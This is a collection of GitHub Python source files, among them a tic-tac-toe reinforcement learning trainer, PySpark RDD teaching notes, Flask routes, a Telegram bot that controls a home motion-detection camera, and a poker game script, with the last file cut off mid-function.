+{"seq_id":"18527481695","text":"from tqdm import tqdm\n\nfrom environment.state import State, all_states\nfrom agent.player import Player\n\n\nclass Judger:\n # @player1: the player who will move first, its chessman will be 1\n # @player2: another player with a chessman -1\n def __init__(self, player1, player2):\n self.p1 = player1\n self.p2 = player2\n self.current_player = None\n self.p1_symbol = 1\n self.p2_symbol = -1\n self.p1.set_symbol(self.p1_symbol)\n self.p2.set_symbol(self.p2_symbol)\n self.current_state = State()\n\n def reset(self):\n self.p1.reset()\n self.p2.reset()\n\n def alternate(self):\n while True:\n yield self.p1\n yield self.p2\n\n # @print_state: if True, print each board during the game\n def play(self, print_state=False):\n alternator = self.alternate()\n self.reset()\n current_state = State()\n self.p1.set_state(current_state)\n self.p2.set_state(current_state)\n if print_state:\n current_state.print_state()\n while True:\n player = next(alternator)\n i, j, symbol = player.act()\n next_state_hash = current_state.next_state(i, j, symbol).hash()\n current_state, is_end, _ = all_states[next_state_hash]\n self.p1.set_state(current_state)\n self.p2.set_state(current_state)\n if print_state:\n current_state.print_state()\n if is_end:\n return current_state.winner\n\n\ndef train(epochs, print_every_n=1000):\n player1 = Player(epsilon=0.01)\n player2 = Player(epsilon=0.01)\n judger = Judger(player1, player2)\n player1_win = 0.0\n player2_win = 0.0\n for i in tqdm(range(1, epochs + 1)):\n winner = judger.play(print_state=False)\n if winner == 1:\n player1_win += 1\n if winner == -1:\n player2_win += 1\n if i % print_every_n == 0:\n print('Epoch %d, player 1 winrate: %.02f, player 2 winrate: %.02f' % (i, player1_win / i, player2_win / i))\n player1.backup()\n player2.backup()\n judger.reset()\n player1.save_policy()\n player2.save_policy()\n\n\ndef compete(turns):\n player1 = Player(epsilon=0)\n player2 = Player(epsilon=0)\n judger = Judger(player1, player2)\n player1.load_policy()\n player2.load_policy()\n player1_win = 0.0\n player2_win = 0.0\n for _ in range(turns):\n winner = judger.play()\n if winner == 1:\n player1_win += 1\n if winner == -1:\n player2_win += 1\n judger.reset()\n print('%d turns, player 1 win %.02f, player 2 win %.02f' % (turns, player1_win / turns, player2_win / turns))\n\n\n# class HumanPlayer:\n# def __init__(self, **kwargs):\n# self.symbol = None\n# self.keys = ['q', 'w', 'e', 'a', 's', 'd', 'z', 'x', 'c']\n# self.state = None\n#\n# def reset(self):\n# pass\n#\n# def set_state(self, state):\n# self.state = state\n#\n# def set_symbol(self, symbol):\n# self.symbol = symbol\n#\n# def act(self):\n# self.state.print_state()\n# key = input(\"Input your position:\")\n# data = self.keys.index(key)\n# i = data // BOARD_COLS\n# j = data % BOARD_COLS\n# return i, j, self.symbol\n#\n# # The game is a zero sum game. 
If both players are playing with an optimal strategy, every game will end in a tie.\n# # So we test whether the AI can guarantee at least a tie if it goes second.\n# def play():\n# while True:\n# player1 = HumanPlayer()\n# player2 = Player(epsilon=0)\n# judger = Judger(player1, player2)\n# player2.load_policy()\n# winner = judger.play()\n# if winner == player2.symbol:\n# print(\"You lose!\")\n# elif winner == player1.symbol:\n# print(\"You win!\")\n# else:\n# print(\"It is a tie!\")\n\ntrain(int(1e4))\ncompete(int(1e3))\n","repo_name":"mabaoer/DRL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16324600344","text":"from torch.utils.data import DataLoader\n\nimport torchvision.datasets as datasets\nimport torchvision.transforms as T\n\n\ndef get_mnist_data_loader(root, batch_size, training=True):\n trfs = T.Compose([\n T.ToTensor()\n ])\n mnist = datasets.MNIST(root=root, train=training, transform=trfs, download=True)\n loader = DataLoader(mnist, batch_size, shuffle=True)\n return loader\n","repo_name":"eMDi94/ContinualLearning","sub_path":"DatasetDistillation/datasets/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21862605496","text":"fig, ax = plt.figure(), plt.axes()\nax.set_aspect(1)\n\n# Patches\nrect = plt.Rectangle(xy = (0.2, 0.2),\n width = 0.6,\n height = .6,\n facecolor = 'C0',\n edgecolor = 'C1')\npatch = ax.add_artist(rect)\n\n# Lines\nx, y = [0.5, 0.5], [0, 1]\nline, = ax.plot(x, y)\nlines = ax.plot(y,x)\n\n# Text\ntext = ax.text(0.2, 0.8, 'Matlotlib', size = 13)","repo_name":"alexanderthclark/Matplotlib-for-Storytellers","sub_path":"python/artists.py","file_name":"artists.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"69"}
+{"seq_id":"9628523224","text":"import functools\nfrom app import app\nfrom flask import jsonify, request\nfrom .utils.api_helpers import get_audio_features, get_playlist_cover_image\n\n@functools.lru_cache(maxsize=30)\n@app.route('/api/v1/user-playlist', methods=['POST'])\ndef user_playlist():\n request_json = request.get_json()\n playlist_id = request_json.get('playlistId')\n if not playlist_id:\n return jsonify({\n 'error': 'Something went wrong'\n })\n return jsonify(get_audio_features('spotify', playlist_id))\n\n@functools.lru_cache(maxsize=30)\n@app.route('/api/v1/get-playlist-cover-image', methods=['POST'])\ndef playlist_cover_image():\n request_json = request.get_json()\n playlist_id = request_json.get('playlistId')\n if not playlist_id:\n return jsonify({\n 'error': 'Something went wrong',\n })\n return jsonify(get_playlist_cover_image(playlist_id))\n","repo_name":"bljustice/playlistviz","sub_path":"services/playlists/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34894498796","text":"#simple python program to calculate bonus for all employees\nsallst=[10000,200000,15000,25000,30000]\nbonus=.5\n#traditional way of writing the common code\nsalbonuslst=[]\nfor sal in sallst:\n salbonuslst.append(sal+(sal*bonus))\nprint(salbonuslst)\n\n#FBP way of writing the python code\nlam=lambda sal:sal+(sal*bonus)\nsalbonuslst=list(map(lam,sallst)) #features of python programming HOF, lambda func, collection\nprint(salbonuslst)\n\ndef fun1(sal):\n return sal+(sal*bonus)\nsalbonuslst=list(map(fun1,sallst)) #50 seconds to process this data\nprint(salbonuslst)\n\n#I am going to conver the above python to a pyspark prog why?\n# Ans0: For handling bigdata with high throughput and low latency\n# Ans1: for distributed/parallel/multithreading/concurrancy In memory computing\n# ans2: improving the performance\n# ans3: scalability, fault tolerant\n\nsallst=[10000,200000,15000,25000,30000]\nbonus=.5\n\n#traditional way of writing the spark core programming\n#from pyspark.context import *\n#sc=SparkContext(\"local[2]\",\"WE39 Application1\") #cluster managers - local/standalone/yarn/mesos/kuberneties\n#rdd1=sc.parallelize(sallst)\n#print(rdd1.getNumPartitions())\n#print(rdd1.glom().collect())\n#rdd2=rdd1.map(fun1)\n#print(rdd2.collect())\n#50 seconds to process this data\n#salbonuslst=map(fun1,sallst)\n#print(salbonuslst)\n#sc.stop()\n\n#modern way of writing the spark core programming and spark sql programming\nfrom pyspark.sql.session import SparkSession\nspark=SparkSession.builder.master(\"local[2]\").appName(\"WE39 Application2\").getOrCreate()\n#the above line has instantiated spark object (used for writing SQL queries),\n# sparkContext object (used for writing core programming)\n#sql program\nspark.read.csv(\"file:///home/hduser/cust_bkp.txt\").show()\n#RDD program\nprint(spark.sparkContext.textFile(\"file:///home/hduser/cust_bkp.txt\").collect())\n\n#We are going to learn the Spark Core Transformations and Actions (not so important interms of working in Orgs,\n# rather important to know once for all)\n#Creating RDDs\n#1. From files, 2. From another RDD, 3. From memory, 4. programatically\nsc=spark.sparkContext\nrdd1=sc.textFile(\"file:///home/hduser/cust_bkp.txt\")\nprint(rdd1.getNumPartitions())\n\n#2. From another RDD\nrdd1.collect()\n#['1,1000', '2,3000', '3,4000', '4,2000']\nlam=lambda x:x.split(\",\")\nrdd2=rdd1.map(lam)\n#[['1', '1000'], ['2', '3000'], ['3', '4000'], ['4', '2000']]\n\n#3. RDD from memory\nrdd2.cache()\nrdd3=rdd2.map(lambda x:int(x[3]))\nprint(rdd3.collect())\nprint(rdd3.sum())\nprint(rdd3.count())\nrdd2.unpersist()\n\n#4. Create RDD Programatically\nrdd1=sc.parallelize(sallst)\nprint(rdd1.getNumPartitions())\nprint(rdd1.glom().collect())\n\n#Transformations :\n#Passive - if a transformation produces the no. of elements output that is equal to the input\n#Active - If a transformation produces the no. 
of elements output that is not equal to the input\n# core - sql - programming lang\n#1.map - select - for loop\nhadooplines= sc.textFile(\"hdfs://127.0.0.1:54310/user/hduser/empdata.txt\")\nprint(hadooplines.collect())\n\nrdd2=hadooplines.map(lambda rec:rec.split(\",\"))\n#below type can be defined as list(list(string))\n#[\n# ['ArunKumar', 'chennai', '33', '2016-09-20', '100000'],\n# ['Lara', 'chennai', '55', '2016-09-21', '10000'],\n# ['vasudevan', 'banglore', '43', '2016-09-23', '90000'],\n# ['irfan', 'chennai', '33', '2019-02-20', '20000'],\n# ['basith', 'CHENNAI', '29', '2019-04-22']\n# ]\nrdd3=rdd2.map(lambda delimitedrec:delimitedrec[1].upper())\nprint(rdd3.collect())\n\n#2.filter - where - for loop and if condition\nrdd4=rdd2.filter(lambda delimitedrec:delimitedrec[1].upper()=='CHENNAI')\nprint(rdd4.collect())\n\n#3. Flatmap - pivot/explode - nested for loop\n# convert the data to structured from unstructured.\n# below data is of what type?\n# structed data with space delimiter but malformed and eligible for becoming semistructured\n# how structed - because the below can be related with each other and they are not seperated/unified/seperated.\n# for eg. irfan's age is 40 or custid 1 is irfan\n# 1 irfan 40\n# 2 30 venkat chennai\n# 33 chennai kavya\n#semi structued format\n# {id:1,name:irfan,age:40}\n# {id:2,age:30,name:venkat,city:chennai}\n# {age:33,city:chennai,name:kavya}\nlinesrdd= sc.textFile(\"file:/home/hduser/mrdata/courses.log\")\nfmrdd=linesrdd.flatMap(lambda x:x.split(\" \"))\nfmrdd.foreach(print)\n\npythonlist=linesrdd.collect()\n#['hadoop spark hadoop spark kafka datascience', 'spark hadoop spark datascience', 'informatica java aws gcp', 'gcp aws azure spark', 'gcp pyspark']\nfor i in pythonlist:\n for j in i.split(\" \"):\n print(j)\n\n#4. union function (merge vertically) - if i pass 5 rows with 3 columns in 2 datsets it returns exactly 10 rows with 3 columns\nrdd1=sc.textFile(\"file:///home/hduser/hive/data/custspilot\").map(lambda x:x.split(\",\")).map(lambda x:(x[0],x[1],'NA',x[2],x[3]))\nrdd2=sc.textFile(\"file:///home/hduser/hive/data/custsnopilot\").map(lambda x:x.split(\",\")).map(lambda x:(x[0],x[1],x[2],x[3],x[4]))\nrdd3=rdd1.union(rdd2)\nrdd4=rdd1.intersection(rdd2)\nrdd5=rdd1.subtract(rdd2)\n\nrdd1=sc.textFile(\"file:///home/hduser/hive/data/custsnopilot\").map(lambda x:x.split(\",\")).map(lambda x:(x[0],x[1],'NA',x[2],x[3]))\nrdd2=sc.textFile(\"file:///home/hduser/hive/data/custsnopilot1\").map(lambda x:x.split(\",\")).map(lambda x:(x[0],x[1],'NA',x[2],x[3]))\nrdd1.union(rdd2).count()\n\n#5. Distinct transformation\nrdd1.union(rdd2).distinct().count()\n\n#6. 
Zip (merge horizontally without a join condition) - if i pass 5 rows with 3 columns in 2 datsets it returns exactly 5 rows with 6 columns\n#Thumb rules:\n# number of rows should be same across both rdds\n# number of rows at every partition should be same across both rdds\n# Used only when there is no key columns available to join the RDDs otherwise Joins are preferred.\nrdd1=sc.textFile(\"file:/home/hduser/cust1.txt\")\nrdd2=sc.textFile(\"file:/home/hduser/cust2.txt\")\n#rdd1.coalesce(1).zip(rdd2.coalesce(1)).collect()\n\n#Zip With Index - add index to all the elements of the rdd\nrdd2=sc.textFile(\"file:/home/hduser/cust2.txt\")\nrdd2.zipWithIndex().collect()\n#usecase - return only the 3rd row of the rdd\nprint(rdd2.zipWithIndex().filter(lambda x:x[1]==2).map(lambda x:x[0]).collect())\n#I have source datafile with header and footer, I want to remove it?\n\n#Very Important:\n\n#Partition - Horizontal division of data or grouping of data or splitting of data or seperation of data\n#why partition - Inorder to divide, distribute, parallelize, throughput, concurrent access/processing of data\n#how to control the partitioning - naturally how it occured or using coalesce and repartition how to change the degree of parallelism\n#using partitioning concepts in our so far learning and subsequent learning\n#HDFS - Blocks, MR - Input split (mappers/reducers), YARN AM/containers, SQOOP Mappers, HIVE Partitions/Buckets,\n# SPARK - partitions (naturally partition created (size, Blocks/Input split/mappers/reducers/Containers/Partitions/Buckets),\n# change the partition)\n\n#naturally how partitions created when we create rdds (in spark core, we learn spark sql and streaming partitioning soon)\n#1. parallelize will go with the number of cores defined in the sparksession object for default partitions\n#2. parallelize will go with the second argument value if i pass a higher or lower number of partitions\n#3. textFile will go with the size of data in a chunk of 32mb by default if the size of the data is >32 mb size\n#4. textFile will go with the default partition of 2 if the data is <32 mb size\n#5. textFile will go with the second argument value if i override with the higher number of partitions that naturally created\n\n#1\nrdd1=sc.parallelize(range(1,100))\nprint(rdd1.getNumPartitions())\n\n#2\nrdd1=sc.parallelize(range(1,100),1)\nprint(rdd1.getNumPartitions())\n\n#3\nrdd1=sc.textFile(\"file:/home/hduser/sparkdata/youtube_videos.tsv\") #size of this data is 143mb\nprint(rdd1.getNumPartitions())\n\n#4\nrdd1=sc.textFile(\"file:/home/hduser/cust1.txt\")\nprint(rdd1.getNumPartitions())\n\n#5\nrdd1=sc.textFile(\"file:/home/hduser/sparkdata/youtube_videos.tsv\",10)\nprint(rdd1.getNumPartitions()) #10\nrdd1=sc.textFile(\"file:/home/hduser/sparkdata/youtube_videos.tsv\",1)\nprint(rdd1.getNumPartitions()) #5\n\n#Partition Handling\n# Difference between coalesce and repartition\n# 1. coalese used to reduce no. of partitions - Repartition is used for increase the no. of partition despite it support decrease the no. of partition also\n# 2. Coalesce will be applied if the data is aggregated or filtered - Repartition will be applied if the data is joined or unioned\n# 3. Coalesce is efficient in distributing the data by avoid shuffling - Repartition is costly because it always shuffles\n# 4. Coalesce is costly in maintaining partition size in equally - Repartition maintains partition size equally\n# 5. 
why inequal partition because Coalesce uses range partitioning - Repartition uses round robin partitioning\n\n#How to increase or decrease the partitions\n\n#coalesce - Used to Decrease the no. of partions we use coalesce function,\n# coalesce supports only decrease the number of partitions,\n#Coalesce use range of partitioning\n#1,2,3,4,5 -> 3- [1,2],[3,4],[5]\n# benefit - try to aviod shuffling (copying of data from mapper/one executor to the reducer/another executor)\n# will happen rarely hence less cost\n# drawback - in-equal number of distribution of partitions happens because of range partitioning\n#When to use Coalesce? applied when we wanted to process the rdd further with less number of tasks or finalize/store the rdds\nrdd2=sc.textFile(\"file:///home/hduser/hive/data/custs2\")\nrdd3=rdd1.union(rdd2)\nrdd3.getNumPartitions()\n#6\nrdd1.getNumPartitions()\n#2\nrdd2.getNumPartitions()\n4\nrdd4=rdd3.repartition(10)\nrdd4=rdd3.map(lambda x:x.split(\",\")).filter(lambda x:int(x[3])>60)\nrdd4.count()\n#758280\nrdd3.count()\n#2669733\nrdd4.getNumPartitions()\n6\nrdd4.getNumPartitions()\n#10\nrdd5=rdd4.coalesce(3)\nprint(rdd5.getNumPartitions())\n\n\n#Repartition - Used to Increase the no. of partions we use repartition function,\n# repartition supports both increase or decrease the number of partitions (preferably coalesce has to be used for decreasing)\n#repartition uses round robin/hash partitioning\n#1,2,3,4,5, -> 3- [1,4],[2,5],[3,6]\n# benefit - equal number of distribution of partitions\n# drawback - shuffling happens hence costly\n#When to use Repartition? applied when we wanted to process the rdd further with more number of tasks (map, filter, flatmap)\n\n#Reduce by key transformation\n#First lets understand reduce function\n# calculate the total sales happened with the transaction amt >1000\nrdd1=sc.textFile(\"file:/home/hduser/cust_bkp.txt\")\nrdd1.collect()\n#['1,Chennai,Mobile,1000', '2,Chennai,Laptop,3000', '3,Hyd,mobile,4000', '4,Chennai,mobile,2000']\nrdd2=rdd1.map(lambda x:x.split(\",\")).map(lambda x:int(x[3])).filter(lambda x:x>1000)\nmapfilterrdd2=rdd1.map(lambda x:x.split(\",\")).map(lambda x:int(x[3])).filter(lambda x:x>1000)\nmapfilterrdd2.collect()\n#[3000, 4000, 2000]\nmapfilterrdd2.getNumPartitions()\n#2\nmapfilterrdd2.reduce(lambda b,f:b+f)\n#9000\n\n# calculate the city wise total sales happened with the transaction amt >1000\nmapfilterrdd2=rdd1.map(lambda x:x.split(\",\")).map(lambda x:((x[1]),int(x[3]))).filter(lambda x:x[1]>1000)\nreducedrdd3=mapfilterrdd2.reduceByKey(lambda x,y:x+y)\nprint(reducedrdd3.collect())\n\n#Checkpoint\n#Below code work well if the source is batch or static or permenant\n\n#What if the source is dynamic or transient or STREAMING in nature, below code will not work well if the source is streaming\n\n#Narrow and wide transformations\n#Narrow transformation - if a transformation depends on the output of the other transformation directly\n#No stage split will happen\n\n\n#Cache and Persist\n#What is- Cache is a transformation used to inform spark not to run the Garbage collection on the rdd that has been cached\n# after we perform an action on the rdd\n#When do we use caching - If we are going to use an rdd or the subsequent rdds repeatedly for performing transformation or action\n#What is Persist - is a transformation used to inform spark not to run the Garbage collection on the rdd that has been persisted\n# in memory/disk/both/with replica/without replica/serialized/non-serialized after we perform an action on the rdd\n#When do we use 
Persist - If we are going to use an rdd or the subsequent rdds repeatedly for performing transformation or action\n# Persist will be used for leveraging more options than than cache in situations such as more volume of data that can't fit in the\n# entire memory or we need to replicate for better fault tolerance or we wanted to try with/without serialized dataset for processing\n# to manage the tradeoff between ser-de and the volume of data - if the volume is not so high then we can keep in a deserialized\n# fashion (we will get the benefits of processing faster without again deserializing)\n\nrdd1=sc.textFile(\"file:/home/hduser/cust_bkp.txt\")\nmapfilterrdd2=rdd1.map(lambda x:x.split(\",\")).map(lambda x:((x[1]),int(x[3]))).filter(lambda x:x[1]>1000)\nreducedrdd3=mapfilterrdd2.reduceByKey(lambda x,y:x+y)\nreducedrdd4=mapfilterrdd2.map(lambda x:x[0])\nreducedrdd3.collect()\n#[('Chennai', 5000), ('Hyd', 4000)]\nrdd1=sc.textFile(\"file:/home/hduser/cust_bkp.txt\")\nreducedrdd4.collect()\n#['Chennai', 'Hyd', 'Chennai']\nrdd1=sc.textFile(\"file:/home/hduser/cust_bkp.txt\")\nmapfilterrdd2=rdd1.map(lambda x:x.split(\",\")).map(lambda x:((x[1]),int(x[3]))).filter(lambda x:x[1]>1000)\nmapfilterrdd2.cache()\n#PythonRDD[357] at RDD at PythonRDD.scala:53\nreducedrdd3=mapfilterrdd2.reduceByKey(lambda x,y:x+y)\nreducedrdd4=mapfilterrdd2.map(lambda x:x[0])\nreducedrdd3.count()\n#2\nreducedrdd4.count()\n#3\nmapfilterrdd2.count()\n#3\nrdd1.count()\n#4\nmapfilterrdd2.unpersist()\n#PythonRDD[357] at RDD at PythonRDD.scala:53\n\nfrom pyspark import StorageLevel\nmapfilterrdd2.persist(StorageLevel.DISK_ONLY)\nmapfilterrdd2.count()\nmapfilterrdd2.persist(StorageLevel.DISK_ONLY_2)\nmapfilterrdd2.unpersist()\nmapfilterrdd2.persist(StorageLevel.DISK_ONLY_2)\nmapfilterrdd2.count()\nmapfilterrdd2.persist(StorageLevel.DISK_ONLY_3)\nmapfilterrdd2.unpersist()\nmapfilterrdd2.persist(StorageLevel.DISK_ONLY_3)\nmapfilterrdd2.count()\nmapfilterrdd2.unpersist()\nmapfilterrdd2.persist(StorageLevel.MEMORY_AND_DISK)\nmapfilterrdd2.count()\nmapfilterrdd2.unpersist()\nmapfilterrdd2.unpersist()\nmapfilterrdd2.persist(StorageLevel.MEMORY_AND_DISK_2)\nmapfilterrdd2.count()\n\n#Cache/Persist vs Checkpoint\n#Cache and Persist will retain the lineage but the Checkpoint will Truncate or cut the lineage and stores the data in HD/HDFS Checkpoint directory\n\n#Cache/Persist will retain the lineage, but use the lineage for the first time materialize the data\n# subsequently provide the data from cache memory/persisted DISK location, if the data in the mem/disk is lost then\n# get it from original source using lineage\n\n#Checkpoint removes the lineage in the DAG and use the lineage for the first time,\n# subsequently always provide the data from checkpoint dir\nsc.setCheckpointDir(\"file:/home/hduser/ckptdir/\") #need to ensure this ckpt dir is present in all workers\nsc.setCheckpointDir(\"/user/hduser/ckptdir/\")#use hdfs for better fault tolerance and performance also\nrdd2.checkpoint()\nrdd2.count()\n\n#saveAsTextFile will help us store the data in the hdfs/linux/cloud fs for using this data across the applications\n\n","repo_name":"sundarbee/Spark_Learning","sub_path":"Python_Pyspark_Programs/we39Project/learnspark/core/core_examples_1.py","file_name":"core_examples_1.py","file_ext":"py","file_size_in_byte":15220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33931282433","text":"import glob, os, psutil, sys, subprocess\nfrom telegram.ext import Updater, CommandHandler\nimport logging\nprint(\"---\")\nprint(\"Starting Telegram bot for home surveillance\")\nprint(\"v. 0.1 by @ttan_\")\nprint(\"---\")\nprint(\"daemonising...\")\n\nif os.fork(): exit(0)\nos.umask(0) \nos.setsid() \nif os.fork(): exit(0)\n\nsys.stdout.flush()\nsys.stderr.flush()\nsi = file('/dev/null', 'r')\nso = file('/dev/null', 'a+')\nse = file('/dev/null', 'a+', 0)\nos.dup2(si.fileno(), sys.stdin.fileno())\nos.dup2(so.fileno(), sys.stdout.fileno())\nos.dup2(se.fileno(), sys.stderr.fileno())\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\nupdater = Updater(token='xx:xxxx') #Telegram bot token here\ndispatcher = updater.dispatcher\nchat_id = 12345 #telegram chat_id (user or group)\n\ndef take_snap(bot, update):\n\tbot.send_message(chat_id, text=\"Taking a snapshot, please wait...\")\n\tres = subprocess.Popen([\"fswebcam\", \"-r 1280x720\", \"grab.jpeg\"], shell=False, stdout=subprocess.PIPE, cwd=\"/root/motion/pics\");\n\tres.wait()\n\tbot.send_photo(chat_id, photo=open(\"/root/motion/pics/grab.jpeg\", \"rb\"))\n\t\ndef clean(bot, update):\n\tdirectory='/root/motion/pics'\n\tos.chdir(directory)\n\tfiles=glob.glob('*.jpg')\n\tfor filename in files:\n\t os.remove(filename)\n\tbot.send_message(chat_id, text=\"All pictures deleted!\")\n\ndef start(bot, update):\n\tbot.send_message(chat_id=update.message.chat_id, text=\"I'm a bot, please talk to me!\")\n\tprint(update.message.chat_id)\n\ndef startMotion(bot, update):\n\tres = subprocess.Popen([\"motion\", \"-c /root/motion/motion.conf\"], shell=False, stdout=subprocess.PIPE, cwd=\"/root/motion\")\n\tbot.send_message(chat_id, text=\"Motion detection started!\")\n\ndef stopMotion(bot, update):\n\tPROCNAME = \"motion\"\n\n\tfor proc in psutil.process_iter():\n\t # check whether the process name matches\n\t if proc.name() == PROCNAME:\n\t proc.kill()\n\n\tbot.send_message(chat_id, text=\"Motion detection stopped!\")\n\ndef checkMotion(bot, update):\n\t ps = subprocess.check_output(('ps'))\n\t if (ps.find(\"motion\")) == -1:\n\t \tbot.send_message(chat_id, text=\"Motion detection not running.\")\n\t else:\n\t \tbot.send_message(chat_id, text=\"Motion detection is running!\")\n\ndef sendLast(bot, update):\n\tlist_of_files = glob.glob('/root/motion/pics/*.jpg') # * means all if need specific format then *.csv\n\tlatest_file = max(list_of_files, key=os.path.getctime)\n\n\tfile_handler = open(latest_file, 'rb')\n\tbot.send_photo(chat_id, photo=file_handler)\n\nsendLast_handler = CommandHandler('sendlast', sendLast)\ndispatcher.add_handler(sendLast_handler)\n\ntakeSnap_handler = CommandHandler('snap', take_snap)\ndispatcher.add_handler(takeSnap_handler)\n\nclean_handler = CommandHandler('cleanpics', clean)\ndispatcher.add_handler(clean_handler)\n\nstartMotion_handler = CommandHandler('startmotion', startMotion)\ndispatcher.add_handler(startMotion_handler)\n\nstopMotion_handler = CommandHandler('stopmotion', stopMotion)\ndispatcher.add_handler(stopMotion_handler)\n\ncheckMotion_handler = CommandHandler('checkmotion', checkMotion)\ndispatcher.add_handler(checkMotion_handler)\n\nif __name__ == '__main__':\n updater.start_polling()\n updater.idle()","repo_name":"ttan/motion-detection-telegram","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"69"}
+{"seq_id":"12673353115","text":"import logging\nimport signal\nimport subprocess\n\nfrom .threads import die\n\n\nlog = logging.getLogger(APP_NAME) # type: ignore\n\n\ndef exec_cmd(cmd):\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n out, err = p.communicate()\n return out, err, p.returncode\n\n\ndef exec_cmd_log(cmd):\n o,e,c = exec_cmd(cmd)\n log.info(f'{cmd} (exit {c}): {o}{e}')\n\n\n# noinspection PyUnusedLocal\nclass SignalHandler:\n\n def __init__(self):\n self.last_signal = 0\n signal.signal(signal.SIGTERM, self.terminate)\n signal.signal(signal.SIGHUP, self.hup)\n\n def hup(self, signum, frame):\n log.warning(f'Signal {signum} received.')\n self.last_signal = signum\n if log.getEffectiveLevel() == logging.INFO:\n log.setLevel(logging.DEBUG)\n elif log.getEffectiveLevel() == logging.DEBUG:\n log.setLevel(logging.INFO)\n\n def terminate(self, signum, frame):\n log.warning(f'Signal {signum} received.')\n self.last_signal = signum\n die()\n","repo_name":"tailucas/pylib","sub_path":"tailucas_pylib/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"33701973380","text":"import ulmo\nimport numpy as np\nfrom datetime import datetime as dt\nfrom matplotlib import pyplot as plt\n\nSITE_ID = '05211000'\nQ_daily_code = '00060:00003'\n\nusgs_gauge = ulmo.usgs.nwis.get_sites(sites=SITE_ID)[SITE_ID]\n\ndaily_request = ulmo.usgs.nwis.get_site_data(SITE_ID, service=\"daily\", period=\"all\")\ndaily_discharge = daily_request[Q_daily_code]['values']\nQ = []\nt = []\nfor row in daily_discharge:\n Q.append( float(row['value']) )\n t.append( dt.strptime(row['datetime'], '%Y-%m-%dT%H:%M:%S') )\n\nQ = np.array(Q)\nt = np.array(t)\n\nnodata_value = float(daily_request.values()[0]['variable']['no_data_value'])\n\nt = t[Q != nodata_value]\nQ = Q[Q != nodata_value]\n\nplt.ion()\nplt.figure(figsize=(18,8))\nplt.plot(t, Q, 'k-', linewidth=2)\nplt.title(usgs_gauge['name'], fontsize=30)\nplt.xlabel('Date', fontsize=20)\n#plt.ylabel('Daily mean discharge [cfs]', fontsize=20)\nplt.ylabel(daily_request.values()[0]['variable']['name'], fontsize=20)\nplt.tight_layout()\n\n","repo_name":"MNiMORPH/Computational-Methods-in-Earth-Sciences","sub_path":"code/FilesData/MississippiGaugeULMO.py","file_name":"MississippiGaugeULMO.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"29471908094","text":"from Deck import Deck\nfrom DisplayBoard import DisplayBoard\nfrom PlaySixHands25 import PlaySixHands25\n\nendgame = False\nwhile endgame == False:\n\n display = DisplayBoard()\n pyramid_poker_hands = Deck(6, 25, 3).deal()\n\n print (\"running PyramidMain\")\n\n for i in range(6):\n print (pyramid_poker_hands[i])\n\n # playsixhands populates best_pyramid_hands and player_win_points\n playsixhands = PlaySixHands25(pyramid_poker_hands)\n\n # put best 6 hands into display.pyramid_hands\n display.pyramid_poker_hands = playsixhands.best_pyramid_hands\n display.player_win_points = playsixhands.player_win_points\n\n # after populating display.attributes, display_6hands\n display.display_6hands()\n\n # now put up playing area\n display.pyr = pyramid_poker_hands[0]\n display.display_next_hand()\n # get player hand\n # populate results of pyramid_hands[0] with player hand\n # now put up playing area","repo_name":"philipblee/Pyramid-Poker-v1","sub_path":"src/PyramidMain.py","file_name":"PyramidMain.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26247719883","text":"def add_time(start, duration,default=\"1\"):\r\n hour_1=[]\r\n minute_1=[]\r\n a=start.split(':')\r\n hour_1.append(int(a[0]))\r\n a=a[1].split(' ')\r\n minute_1.append(int(a[0]))\r\n time_domain=[]\r\n time_domain.append(a[1])\r\n hour_1.append(duration.split(':')[0])\r\n minute_1.append(duration.split(':')[1])\r\n days=int(hour_1[1])//24\r\n hours_left=int(hour_1[1])-24*days\r\n actual_hours=int(hour_1[0])+hours_left\r\n actual_minutes=int(minute_1[0])+int(minute_1[1])\r\n if(actual_minutes>=60):\r\n actual_hours+=1\r\n actual_minutes-=60\r\n if(actual_hours<=12):\r\n if(actual_hours<12 and actual_hours!=0):\r\n new_time=str(actual_hours)+\":\"\r\n if(actual_minutes<10):\r\n new_time+=\"0\"+str(actual_minutes)+\" \"+time_domain[0]\r\n else:\r\n new_time+=str(actual_minutes)+\" \"+time_domain[0]\r\n elif(actual_hours==0):\r\n actual_hour+=12\r\n new_time=str(actual_hours)+\":\"\r\n if(actual_minutes<10):\r\n new_time+=\"0\"+str(actual_minutes)+\" \"+time_domain[0]\r\n else:\r\n new_time+=str(actual_minutes)+\" \"+time_domain[0]\r\n else:\r\n new_time=str(actual_hours)+\":\"\r\n if(actual_minutes<10):\r\n new_time+=\"0\"+str(actual_minutes)\r\n else:\r\n new_time+=str(actual_minutes)\r\n if(time_domain[0]==\"PM\"):\r\n new_time+=\" \"+\"AM\"\r\n else:\r\n new_time+=\" \"+\"PM\"\r\n elif(actual_hours>12 and actual_hours<24):\r\n actual_hours-=12\r\n if(actual_minutes>=10):\r\n new_time=str(actual_hours)+\":\"+str(actual_minutes)+\" \"\r\n else:\r\n new_time=str(actual_hours)+\":\"+\"0\"+str(actual_minutes)+\" \"\r\n if(time_domain[0]==\"PM\"):\r\n new_time+=\"AM\"\r\n else:\r\n 